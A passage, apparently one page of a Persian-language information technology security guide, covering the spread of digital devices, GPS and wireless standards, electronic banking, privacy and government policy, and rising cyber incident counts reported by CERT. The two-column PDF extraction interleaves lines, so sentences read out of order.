ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻜﺎﻧﻴﺎﺑﻲ ﺟﻬﺎﻧﻲ ) ١٣(GPSﻧﻴﺰ ﺑﻪ ﺷﻤﺎ ﺍﻳﻦ ﺍﻣﻜـﺎﻥ ﺷﺪﻩﺍﻧﺪ؛ ﭼﺮﺍﻛﻪ ﺑﺪﻳﻦ ﺷﻜﻞ ﻫﺰﻳﻨـﻪﻫـﺎﻱ ﺗﻮﻟﻴـﺪ ﺁﻧﻬـﺎ ﻛﻤﺘـﺮ ﻭ
ﺑﺨﺶ ﺍﻭﻝ
ﺭﺍ ﻣﻲ ﺩﻫﻨﺪ ﻛﻪ ﺑﺪﺍﻧﻴﺪ ﺩﺭ ﻫﺮ ﻟﺤﻈﻪ ﺩﺭ ﭼـﻪ ﻣﻜـﺎﻧﻲ ﺭﻭﻱ ﻛـﺮﺓ ﻛﻴﻔﻴﺘﺸﺎﻥ ﺑﻴﺸﺘﺮ ﺍﺳﺖ .ﺭﻓﺘﻪ ﺭﻓﺘﻪ ﻧﻮﺍﺭﻫﺎﻱ ﻭﻳﺪﺋﻮﻳﻲ ﺟﺎﻱ ﺧـﻮﺩ
ﺯﻣﻴﻦ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪﺍﻳﺪ ﻭ ﺑﺎ ﺩﺍﺷﺘﻦ ﭼﻨﻴﻦ ﺩﺳﺘﮕﺎﻩ ﻧﺴﺒﺘﹰﺎ ﺍﺭﺯﺍﻧـﻲ ﺩﺭ ﺭﺍ ﺑﻪ ﻓﻨﺎﻭﺭﻱ DVDﺩﺍﺩﻩﺍﻧﺪ ﻭ ﻓﻴﻠﻤﻬﺎﻱ ﺳﻴﻨﻤﺎﻳﻲ ﺑـﺎ ﺍﻣﻜﺎﻧـﺎﺕ
ﻛﻨﺎﺭ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻛﻪ ﺣﺎﻭﻱ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩﺍﻱ ﺍﺯ ﻧﻘﺸﻪﻫﺎ ﺑﺎﺷﺪ ﻗﺎﺩﺭ ﺑﻪ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺳﺎﺧﺘﻪ ﻭ ﺗﺪﻭﻳﻦ ﻣﻲﮔﺮﺩﻧﺪ.
ﻳﺎﻓﺘﻦ ﻣﺴﻴﺮ ﺣﺮﻛﺖ ،ﻧﻘﺎﻁ ﻣﻬﻢ ،ﺭﺳﺘﻮﺭﺍﻧﻬﺎ ،ﺗﺎﺑﻠﻮﻫـﺎﻱ ﺭﺍﻫﻨﻤـﺎ، ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺗﻠﻔﻨﻬـﺎﻱ ﺑـﻲﺳـﻴﻢ ﺩﺭﺣـﺎﻝ ﺣﺮﻛـﺖ ﺑـﻪ ﺳـﻤﺖ
ﺧﺪﻣﺎﺕ ﺍﺭﺍﺋﻪﺷﺪﻩ ﺩﺭ ﻃﻮﻝ ﻣﺴﻴﺮ ،ﻭ ﺩﺭ ﻧﻬﺎﻳﺖ ﻣﻘﺼﺪ ﻣﻮﺭﺩ ﻧﻈـﺮ ﻓﻨﺎﻭﺭﻱ ﺩﻳﺠﻴﺘﺎﻝ ﻫﺴﺘﻨﺪ ﻭ ﺑﺎ ﻭﺟﻮﺩ ﭘﺮﻭﺗﻜﻠﻬﺎﻳﻲ ﭼـﻮﻥ ،GSM
ﺧﻮﺍﻫﻴﺪ ﺑﻮﺩ. TDMA ،CDMAﻭ ﮔﻮﻧﻪﻫﺎﻱ ﻣﺨﺘﻠﻒ ﺁﻧﻬﺎ ﺑﺘﺪﺭﻳﺞ ﺟﺎﻳﮕﺰﻳﻦ
ﺍﻳﻦ ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺩﻳﺠﻴﺘﺎﻝ ﺑـﺎ ﺳـﺮﻋﺘﻲ ﺑـﺎﻭﺭﻧﻜﺮﺩﻧﻲ ﺩﺭ ﺷـﺒﻜﻪ ﻧﺴﻞ ﻗﺪﻳﻤﻲ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﻓﻨـﺎﻭﺭﻱ ﺁﻧـﺎﻟﻮﮒ ﺧﻮﺍﻫﻨـﺪ ﺷـﺪ .ﺩﺭ
ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ .ﺗﻠﻔﻨﻬﺎﻱ ﺑﻲﺳﻴﻢ ﻗﺎﺩﺭ ﺑـﻪ ﺑﺮﻗـﺮﺍﺭﻱ ﺍﺭﺗﺒـﺎﻁ ﺑـﺎ ﻛﺸﻮﺭﻫﺎﻱ ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ ﺗﻠﻮﻳﺰﻳﻮﻥ ﺩﻳﺠﻴﺘﺎﻝ ﺑﻪ ﺻﺤﻨﻪ ﺁﻣﺪﻩ ﺍﺳﺖ
ﺍﻳﻨﺘﺮﻧﺖ ﻫﺴﺘﻨﺪ ﻭ ﺍﺑﺘﺪﺍ ﻗﺎﺩﺭ ﺑﻪ ﺍﺭﺳﺎﻝ ﺻﻮﺕ ﻭ ﺍﻛﻨﻮﻥ ﻗـﺎﺩﺭ ﺑـﻪ ﻭ ﺩﻳﺮﻱ ﻧﺨﻮﺍﻫﺪ ﮔﺬﺷﺖ ﻛﻪ ﺟﺎﻱ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﭘﺨﺶ ﺑﺮﻧﺎﻣـﻪ
ﻣﺒﺎﺩﻟﺔ ﺗﺼﺎﻭﻳﺮ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧـﺖ ﻣـﻲ ﺑﺎﺷـﻨﺪ ﻭ ﺑـﺰﻭﺩﻱ ﺩﺍﺭﺍﻱ ﺭﺍ ﺧﻮﺍﻫﺪ ﮔﺮﻓﺖ )ﻫﺮﭼﻨﺪ ﻛﻪ ﺍﻳﻦ ﺗﻐﻴﻴﺮ ﻛﻤﻲ ﻛﻨﺪﺗﺮ ﺍﺯ ﺑﻘﻴﻪ ﺧﻮﺍﻫـﺪ ﺑـﻮﺩ؛
ﻗﺎﺑﻠﻴﺖ GPSﻧﻴﺰ ﺧﻮﺍﻫﻨﺪ ﺷﺪ ﻭ ﺑﻪ ﺍﻳﻦ ﺗﺮﺗﻴﺐ ﺍﻓﺮﺍﺩﻱ ﻛـﻪ ﺩﺭ ﭼﺮﺍﻛﻪ ﺣﺠﻢ ﮔﻴﺮﻧﺪﻩﻫﺎﻱ ﺧﺎﻧﮕﻲ ﻣﻮﺟﻮﺩ ﻛﻪ ﺑـﻪ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﻗـﺪﻳﻤﻲﺗـﺮ
ﻣﻌﺮﺽ ﺧﻄﺮ ﻭ ﺣﺎﺩﺛﻪ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺑﺎﺷﻨﺪ ﺭﺍ ﻣـﻲﺗـﻮﺍﻥ ﺑـﺎ ﺩﻗﺘـﻲ ﻭﺍﺑﺴﺘﻪﺍﻧﺪ ﺑﺴﻴﺎﺭ ﻭﺳﻴﻊ ﺍﺳﺖ(.
ﺯﻳﺎﺩ ﻭ ﺗﻨﻬﺎ ﺑﺎ ﻳﻚ ﺗﻠﻔﻦ ﻣﻜﺎﻧﻴﺎﺑﻲ ﻛﺮﺩ .ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺧﺪﻣﺎﺗﻲ ﻛـﻪ ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺍﻣﻨﻴــﺖ ﻓﻴﺰﻳﻜــﻲ ﻧﻴــﺰ ﺩﺭﺣــﺎﻝ ﺗﺒــﺪﻳﻞ ﺑــﻪ ﺍﻧــﻮﺍﻉ
ﺍﻛﻨﻮﻥ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﺓ ﻣﺎ ﻗﺮﺍﺭ ﻣـﻲ ﮔﻴﺮﻧـﺪ -ﻣﺜـﻞ ﺩﺳـﺘﮕﺎﻫﻬﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺧﻮﺩ ﻫﺴﺘﻨﺪ .ﺩﺭ ﻫﺘﻠﻬﺎ ،ﺁﭘﺎﺭﺗﻤﺎﻧﻬـﺎ ﻭ ﺩﻓـﺎﺗﺮ ﺍﺩﺍﺭﻱ،
ﺧﻮﺩﭘﺮﺩﺍﺯ ﻛﻪ ﺑﺮﺍﻱ ﺗﺒﺎﺩﻝ ﻭ ﻧﻘﻞ ﻭ ﺍﻧﺘﻘﺎﻝ ﭘﻮﻝ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧـﺪ - ﻛﻠﻴﺪﻫﺎﻱ ﻓﻴﺰﻳﻜـﻲ ﺟـﺎﻱ ﺧـﻮﺩ ﺭﺍ ﺑـﻪ ﻛﺎﺭﺗﻬـﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ
ﺑﺮ ﺍﺳﺎﺱ ﺍﺻﻞ "ﺩﺭ ﺩﺳﺘﺮﺱ ﺑﻮﺩﻥ ﺷﺒﻜﻪ" ﻛﺎﺭ ﻣﻲﻛﻨﻨﺪ .ﻧﻘـﻞ ﻭ ﺩﺍﺩﻩ ﺍﻧﺪ .ﺩﻭﺭﺑﻴﻨﻬﺎﻱ ﺗﻠﻮﻳﺰﻳﻮﻧﻲ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﺩﺭ ﺳﻴـﺴﺘﻤﻬﺎﻱ
ﺍﻧﺘﻘﺎﻻﺕ ﻣﺎﻟﻲ ﻭ ﺍﻋﺘﺒﺎﺭﻱ ﻣﻴﺎﻥﺑﺎﻧﻜﻲ ﻭ ﺑـﻴﻦ ﺍﻟﻤﻠﻠـﻲ ﻭﺍﺑـﺴﺘﮕﻲ ﻧﻈــﺎﺭﺗﻲ ﺳــﺎﺧﺘﻤﺎﻧﻬﺎ ﻭ ﺗﺄﺳﻴــﺴﺎﺕ ﻧﻴــﺰ ﺍﻏﻠــﺐ ﺍﺯ ﺗﺠﻬﻴــﺰﺍﺕ
ﺯﻳﺎﺩﻱ ﺑﻪ ﺷﺒﻜﻪﻫﺎﻱ ﺍﻋﺘﺒﺎﺭﻱ ﻭ ﻣﺎﻟﻲ ﺩﺍﺭﻧـﺪ ١٤.ﺍﻣـﺮﻭﺯﻩ ﻧﻘـﻞ ﻭ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲ ﻛﻨﻨﺪ ﻛـﻪ ﺑﺠـﺎﻱ ﺍﺭﺳـﺎﻝ ﺳـﻴﮕﻨﺎﻟﻬﺎﻱ
ﺍﻧﺘﻘﺎﻻﺕ ﺑﺎﻧﻜﻬﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧـﺖ ﺑـﺮﺍﻱ ﺍﻓـﺮﺍﺩ ﺗﻠﻮﻳﺰﻳﻮﻧﻲ ﺑﻪ ﻳﻚ ﻣﺎﻧﻴﺘﻮﺭ ﻭﻳﺪﺋﻮﻳﻲ ،ﺗﺼﺎﻭﻳﺮ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺭﺍ ﺑـﻪ
ﻣﻴﺴﺮ ﺍﺳﺖ. ١٢
ﺍﻳﺴﺘﮕﺎﻫﻬﺎﻱ ﻧﻈﺎﺭﺕ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺍﺭﺳﺎﻝ ﻣﻲﻛﻨﻨﺪ.
ﻲ ﺩﻳﺠﻴﺘﺎﻝ ﻭ ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﻣﺮﺗﺒﻂ ﺑﺎ ﺗﻮﺳﻌﺔ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜ ﹺ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺧﺪﻣﺎﺗﻲ ﻛﻪ ﺍﻣﺮﻭﺯﻩ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨـﻴﻢ ﺑـﺪﻭﻥ
ﻫﻢ ﻓﻮﺍﻳﺪ ﺑـﺴﻴﺎﺭﻱ ﺩﺍﺭﺩ؛ ﻭﻟـﻲ ﻧﻜـﺎﺕ ﻣﻨﻔـﻲ ﻧﻴـﺰ ﺩﺭ ﺁﻥ ﻗﺎﺑـﻞ ﻭﺟﻮﺩ ﺭﺍﻳﺎﻧﻪ ،ﺷﺒﻜﻪ ﻭ ﻓﻨﺎﻭﺭﻱ ﺩﻳﺠﻴﺘﺎﻝ ﻗﺎﺑﻞ ﺍﺭﺍﺋﻪ ﻧﺨﻮﺍﻫﻨﺪ ﺑﻮﺩ.
ﻣﺸﺎﻫﺪﻩ ﺍﺳﺖ .ﭘﻴﺪﺍ ﻛﺮﺩﻥ ﻣﺤﻞ ﺍﺳﺘﻘﺮﺍﺭ ﺷﻤﺎ ﺑﺮﺍﻱ ﺍﻓﺮﺍﺩ ﺁﺳﺎﻧﺘﺮ ﺧﻄــﻮﻁ ﻫــﻮﺍﻳﻲ ﻧﻴــﺰ ﺑــﺪﻭﻥ ﺳﻴــﺴﺘﻤﻬﺎﻱ ﺭﺯﺭﻭ ﺭﺍﻳﺎﻧــﻪﺍﻱ ﻭ
ﺷﺪﻩ ﺍﺳﺖ .ﺩﻳـﺪﻥ ﺻـﻔﺤﺎﺕ ﺗﺒﻠﻴﻐـﺎﺗﻲ ﻭﺏ ،ﻳـﺎﻓﺘﻦ ﺁﻧﭽـﻪ ﻛـﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻧﮕﻬﺪﺍﺭﻱ ﻭ ﭘﺸﺘﻴﺒﺎﻧﻲ ﭘﺮﻭﺍﺯ ﻗﺎﺩﺭ ﺑﻪ ﺭﻗﺎﺑﺖ ﺑـﺎ ﻫـﻢ
ﺑﺪﻧﺒﺎﻝ ﺧﺮﻳﺪ ﺁﻥ ﺩﺭ ﻣﻐـﺎﺯﻩﻫـﺎ ﻫـﺴﺘﻴﺪ ،ﻭ ﻣـﺸﺎﻫﺪﺓ ﺁﻧﭽـﻪ ﻛـﻪ ﻧﻴﺴﺘﻨﺪ .ﻫﻮﺍﭘﻴﻤﺎﻫﺎ ﺗﺎ ﺍﻧﺪﺍﺯﺓ ﺯﻳﺎﺩﻱ ﺑﻪ ﺣﺴﮕﺮﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ
ﺩﺭﺣﺎﻝ ﺗﻤﺎﺷﺎ ﻳﺎ ﺧﻮﺍﻧﺪﻥ ﺑﺼﻮﺭﺕ ﺑﺮﺧﻂ ﻫﺴﺘﻴﺪ ﻧﻴﺰ ﺳـﺎﺩﻩﺗـﺮ ﺍﺯ ﻛﻨﺘﺮﻟﻬﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﻭﺍﺑﺴﺘﻪﺍﻧﺪ ﻭ ﺑﺪﻭﻥ ﺁﻧﻬﺎ ﻧﻤﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﺧﻮﺑﻲ
ﻗﺒﻞ ﻣﻲﺑﺎﺷﺪ .ﺍﮔﺮ ﭼﻨﻴﻦ ﻧﻈﺎﺭﺗﻲ ﺑـﺮ ﻣﻨـﺎﻓﻊ ﺷـﻤﺎ ﺣـﺎﻛﻢ ﺑﺎﺷـﺪ ﻛﺎﺭ ﻛﻨﻨﺪ .ﺣﺘﻲ ﺍﺗﻮﻣﺒﻴﻠﻬﺎ ﻧﻴﺰ ﺑﺮﺍﻱ ﻋﻤﻠﻜﺮﺩ ﻣﻨﺎﺳﺐ ﻭ ﻛﻤﻚ ﺑـﻪ
ﻗﺎﻋﺪﺗﹰﺎ ﺷـﻤﺎ ﺍﺯ ﺁﻥ ﺑـﺎﺧﺒﺮ ﻧﺨﻮﺍﻫﻴـﺪ ﺷـﺪ ،ﺍﻣـﺎ ﺷـﺎﻳﺪ ﺑﺨﻮﺍﻫﻴـﺪ
ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﭼﻨـﻴﻦ ﺩﺍﺩﻩﻫـﺎﻳﻲ ﺑـﺎ ﻛـﺴﺐ ﺍﺟـﺎﺯﻩ ﺍﺯ ﺷـﻤﺎ
ﺟﻤﻊﺁﻭﺭﻱ ﻣﻲﺷﻮﻧﺪ ﻭ ﺗﻨﻬﺎ ﺑﺮﺍﻱ ﺍﻫﺪﺍﻓﻲ ﺑﻜﺎﺭ ﻣـﻲﺭﻭﻧـﺪ ﻛـﻪ ﺍﺯ اﻳﻦ ﻣﻮﺭﺩ ﺧﺎﺹ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﺸﺎﻏﻞ ﺭﺍ ﺑﻪ ﺳﻤﺖ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣـﺎﻝ ۱۲
ﺗﻮﺳﻌﻪ ﻫﺪﺍﻳﺖ ﻛﻨﺪ .ﺑﻪ ﻣﺤﺾ ﺍﻳﻨﻜﻪ ﺗﺼﺎﻭﻳﺮ ﺩﺭ ﻗﺎﻟﺐ ﺩﻳﺠﻴﺘﺎﻝ ﺩﺭﺁﻳﻨﺪ
ﻭ ﺭﻭﻱ ﺍﻳﻨﺘﺮﻧﺖ ﻗﺮﺍﺭ ﺩﺍﺩﻩ ﺷﻮﻧﺪ ،ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﻳﻚ ﺳﻴﺴﺘﻢ ﻧﻈـﺎﺭﺕ ﺩﺭ
13 Global Positioning System ﻫﺮ ﻛﺠﺎﻱ ﺷﺒﻜﻪ ﻓﺮﺳﺘﺎﺩﻩ ﺷﻮﻧﺪ .ﺑﻨﺎﺑﺮ ﭘﻴﺶﺑﻴﻨﻲﻫﺎ ﺍﻳﻦ ﻗﺎﺑﻠﻴﺖ ﺍﻣﻨﻴﺘﻲ
ﺷﺒﻜﺔ ﺗﺒﺎﺩﻝ ﻣﺎﻟﻲ ﻣﻴﺎﻥ ﺑﺎﻧﻜﻬﺎ ﺩﺭ ﮔﺬﺷﺘﻪ ﺍﺯ ﻳـﻚ ﺷـﺒﻜﺔ ﺍﺧﺘـﺼﺎﺻﻲ ۱۴ ﻛﻪ ﺑﻪ ﻣﻬﺎﺭﺕ ﺧﺎﺻﻲ ﻧﻴﺎﺯ ﻧﺪﺍﺭﺩ ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ
ﺑﺴﻴﺎﺭ ﺍﻳﻤﻦ ﻛﻪ ﺑﺮﺍﻱ ﻫﻤﻴﻦ ﻫﺪﻑ ﺧﺎﺹ ﻃﺮﺍﺣﻲ ﺷـﺪﻩ ﺑـﻮﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﺑﺎ ﻫﺰﻳﻨﺔ ﻛﻤﺘﺮ ﻭ ﻛﻴﻔﻴﺖ ﺑﺮﺍﺑﺮ ﺭﺍﻩﺍﻧـﺪﺍﺯﻱ ﺷـﻮﺩ .ﺍﻳـﻦ ﭘﻴـﺸﻨﻬﺎﺩ ﺩﺭ ﺑـﺎ
ﻣﻲﻛﺮﺩ ﻭ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﻧﻴﺰ ﻣﺘﺼﻞ ﻧﺒﻮﺩ .ﺍﻳﻦ ﻣـﺴﺌﻠﻪ ﺑـﺎ ﺩﺭﻧﻈـﺮ ﮔـﺮﻓﺘﻦ ﺍﺳﺘﻘﺒﺎﻝ ﺗﻮﺳﻌﻪﺩﻫﻨﺪﮔﺎﻥ ﻣﻮﺍﺟﻪ ﺷـﺪ ،ﺍﻣـﺎ ﺍﺯ ﺁﻧﺠـﺎ ﻛـﻪ ﺩﺭ ﺍﻳـﻦ ﻧـﻮﻉ
ﺍﺭﺯﺵ ﺯﻳﺎﺩ ﺁﻥ ﺷﺒﻜﻪ ﻭ ﺗﺄﺛﻴﺮﺍﺕ ﺑﺴﻴﺎﺭ ﻣﺨﺮﺏ ﻭ ﺟﺪﻱ ﻫﺮﮔﻮﻧـﻪ ﻧﻔـﻮﺫ ﻭﺍﮔﺬﺍﺭﻱ ﻣﺮﺯﻫﺎﻱ ﻣﻠﻲ ﺩﺭ ﻧﻮﺭﺩﻳﺪﻩ ﻣـﻲﺷـﻮﻧﺪ ،ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺑﺮﺧـﻲ
ﻼ ﻣﻨﻄﻘﻲ ﺑﻨﻈﺮ ﻣﻲﺭﺳﺪ. ﺑﻪ ﺁﻥ ﻛﺎﻣ ﹰ ﻧﮕﺮﺍﻧﻴﻬﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ﺑﻪ ﺑﺎﺭ ﺑﻴﺎﻳﻨﺪ.
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٣٠
ﺍﺭﺯﺷﻤﻨﺪ ﺳﺎﺯﻣﺎﻧﻬﺎ ﻭ ﻣﺆﺳﺴﺎﺕ ﭼﻨﺪﺍﻥ ﻗﺎﺑﻞ ﺗﻮﺟﻪ ﻧﻤﻲﺑﺎﺷـﺪ .ﺍﺯ ﺁﻥ ﺍﻃﻼﻉ ﺩﺍﺭﻳﺪ ﻭ ﺑﺎ ﺁﻥ ﻣﻮﺍﻓﻖ ﻫﺴﺘﻴﺪ .ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﺮﺩﻡ ﺑـﺮﺍﻱ
ﺩﻳﮕﺮ ﻣﻮﺍﺭﺩﻱ ﻛﻪ ﻣﻲ ﺗﻮﺍﻧﺪ ﺑﺴﻴﺎﺭ ﻣﻬﻢ ﺑﺎﺷﺪ ﺁﻧـﺴﺖ ﻛـﻪ ﺗـﺄﺛﻴﺮ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺧﻮﺩ ﺍﻫﻤﻴﺖ ﺯﻳﺎﺩﻱ ﻗﺎﺋﻞ ﻫﺴﺘﻨﺪ ﻭ ﺩﻭﻟﺘﻬﺎ ﻧﻴـﺰ
ﺳﺮﻗﺖ ﻭ ﻭﻗﻮﻉ ﺗﺨﻠﻒ ﻣﺎﻟﻲ ﺩﺭ ﻳﻚ ﺷﺮﻛﺖ ﺗﻨﻬﺎ ﻣﺤﺼﻮﺭ ﺑﻪ ﺁﻥ ﻣﺎﻳﻞ ﺑﻪ ﺣﻔﻆ ﺣﻘﻮﻕ ﺍﻓﺮﺍﺩ ﻣﻲﺑﺎﺷـﻨﺪ ،ﮔﺮﭼـﻪ ﻣﻴـﺰﺍﻥ ﻭ ﺷـﺪﺕ
ﺷﺮﻛﺖ ﻧﻴﺴﺖ ﻭ ﺩﺭ ﻛﻞ ﺻﻨﻌﺖ ﻛﺸﻮﺭ ﺗﺄﺛﻴﺮ ﻣﻲﮔﺬﺍﺭﺩ. ﺍﺟﺮﺍﻱ ﻗﻮﺍﻧﻴﻦ ﺍﺯ ﻳﻚ ﻛﺸﻮﺭ ﺗـﺎ ﻛـﺸﻮﺭ ﺩﻳﮕـﺮ ﻣﺘﻔـﺎﻭﺕ ﺍﺳـﺖ.
ﻣﺴﺌﻠﻪ ﺍﺻﻠﻲ ﺑـﺮﺍﻱ ﺩﻭﻟﺘﻬـﺎ ﺍﻳـﻦ ﺍﺳـﺖ ﻛـﻪ ﻣﻨـﺎﻓﻊ ﺣﺎﺻـﻞ ﺍﺯ
ﺑﺎ ﮔﺴﺘﺮﺵ ﺍﻳﻨﺘﺮﻧﺖ ﻭ ﺍﻓﺰﺍﻳﺶ ﭼـﺸﻤﮕﻴﺮ ﻧﮕﺮﺍﻧﻴﻬـﺎﻱ ﻧﺎﺷـﻲ ﺍﺯ
ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﻧﻮﻇﻬﻮﺭ ﺭﺍ ﺗﺸﺨﻴﺺ ﺩﻫﻨﺪ ﻭ ﺩﺭ ﻋﻴﻦ ﺣﺎﻝ ﺍﺭﺯﺷﻬﺎ ﻭ
ﺣﻤﻼﺕ ﺳﺎﻳﺒﺮ ،١٧ﺗﻌﺪﺍﺩ ﭼﻨﻴﻦ ﺣﻮﺍﺩﺛﻲ ﻧﻴﺰ ﺭﻭ ﺑﻪ ﺍﻓﺰﺍﻳﺶ ﺍﺳﺖ:
ﺁﺯﺍﺩﻳﻬﺎﻳﻲ ﻛﻪ ﺑﺪﻭﻥ ﺁﻥ ﻓﻨﺎﻭﺭﻳﻬﺎ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﺁﻧﻬﺎ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺑـﻮﺩ
"ﺑﺎ ﻭﺟﻮﺩ ﺍﻳﻨﻜﻪ ﺭﺍﻳﺎﻧﻪ ﻫﺎ ﻧﻘﻄﺔ ﻣﻨﺎﺳـﺒﻲ ﺑـﺮﺍﻱ ﺍﻧﺠـﺎﻡ ﺣﻤـﻼﺕ ﺭﺍ ﻫﻤﭽﻨﺎﻥ ﺣﻔﻆ ﻛﻨﻨﺪ .ﻣﻮﺿﻮﻉ ﺍﻳـﻦ ﺍﺳـﺖ ﻛـﻪ ﺩﻭﻟﺘﻬـﺎ ﺑﺎﻳـﺪ
ﺗﺮﻭﺭﻳﺴﺘﻲ ﻫﺴﺘﻨﺪ ،ﺍﻣﺎ ﺍﻳﻦ ﻧﻜﺘﻪ ﺭﺍ ﻧﻴﺰ ﺑﺎﻳﺪ ﺩﺭﻧﻈـﺮ ﺩﺍﺷـﺖ ﻛـﻪ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺟﺪﻳﺪ ﺭﺍ ﺩﺭﻙ ﻛﺮﺩﻩ ﻭ ﺗﺄﺛﻴﺮ ﻗﺎﺑﻠﻴﺘﻬﺎ ﻭ ﺍﻣﻜﺎﻧﺎﺕ ﻧﻮﻳﻦ
ﺑﺮﺧﻲ ﺍﻗﺪﺍﻣﺎﺕ ﺧﺮﺍﺑﻜﺎﺭﺍﻧﻪ ﺗﻮﺳﻂ ﺍﻓﺮﺍﺩﻱ ﺻﻮﺭﺕ ﻣﻲﮔﻴﺮﻧﺪ ﻛـﻪ ﺑﺮ ﺁﺯﺍﺩﻳﻬﺎ ﺭﺍ ﺍﺭﺯﻳﺎﺑﻲ ﻧﻤﺎﻳﻨـﺪ .ﻫﻤﭽﻨـﻴﻦ ﺩﻭﻟﺘﻬـﺎ ﺑﺎﻳـﺪ ﮔﺎﻣﻬـﺎﻱ
ﺍﺯ ﺍﻳﻦ ﺭﺍﻩ ﺑﺪﻧﺒﺎﻝ ﻛﺴﺐ ﺩﺭﺁﻣﺪ ﻫﺴﺘﻨﺪ .ﻣﺮﻛﺰ ﻓﻮﺭﻳﺘﻬﺎﻱ ﺍﻣﻨﻴـﺖ ﻣﺆﺛﺮﻱ ﺑﺮﺩﺍﺭﻧﺪ ﺗـﺎ ﻣﻄﻤـﺌﻦ ﺷـﻮﻧﺪ ﺍﮔـﺮ ﻗـﻮﺍﻧﻴﻦ ﻭ ﺳﻴﺎﺳـﺘﻬﺎﻱ
ﺭﺍﻳﺎﻧﻪﺍﻱ ) ١٨(CERTﺩﺭ ﺳﺎﻝ ۲۰۰۱ﻣـﻴﻼﺩﻱ ﺭﻗﻤـﻲ ﺑﺮﺍﺑـﺮ ﺑـﺎ ﻋﻤﻮﻣﻲ ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ ﺁﺯﺍﺩﻳﻬـﺎﻱ ﻓﻌﻠـﻲ ﺭﺍ ﺗﻘﻮﻳـﺖ ﻧﻤـﻲﻛﻨﻨـﺪ،
۵۲۶۵۸ﺭﺧﺪﺍﺩ ﺍﻣﻨﻴﺘﻲ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺭﺍ ﺷﻨﺎﺳﺎﻳﻲ ﻛﺮﺩﻩ ﻛـﻪ ﺩﻭ ﺑﺮﺍﺑـﺮ ﺣﺪﺍﻗﻞ ﻳﻚ ﻭﻓﺎﻕ ﺟﻤﻌﻲ ﺩﺭ ﻣﻮﺭﺩ ﺁﻧﻬﺎ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ.
ﺗﻌﺪﺍﺩ ﻳﻜﺴﺎﻝ ﻗﺒﻠﺘﺮ ﺍﺳﺖ ﻭ ﻧﺴﺒﺖ ﺑﻪ ﺩﻭ ﺳﺎﻝ ﭘﻴﺶ ﺍﺯ ﺁﻥ ﭼﻬﺎﺭ
١٩ ﻻ ﺑـﺎ ﻋﻨـﻮﺍﻥ ﻓـﻀﺎﻱ ﺳـﺎﻳﺒﺮ ١٥ﺷـﻨﺎﺧﺘﻪ ﺩﻧﻴﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﻣﻌﻤﻮ ﹰ
ﺑﺮﺍﺑﺮ ﻣﻲﺑﺎﺷﺪ".
ﻣﻲﺷﻮﺩ ﻭ ﺗﻌﺮﻳﻒ ﺁﻥ ﺗﻤﺎﻣﻲ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﻛـﻪ
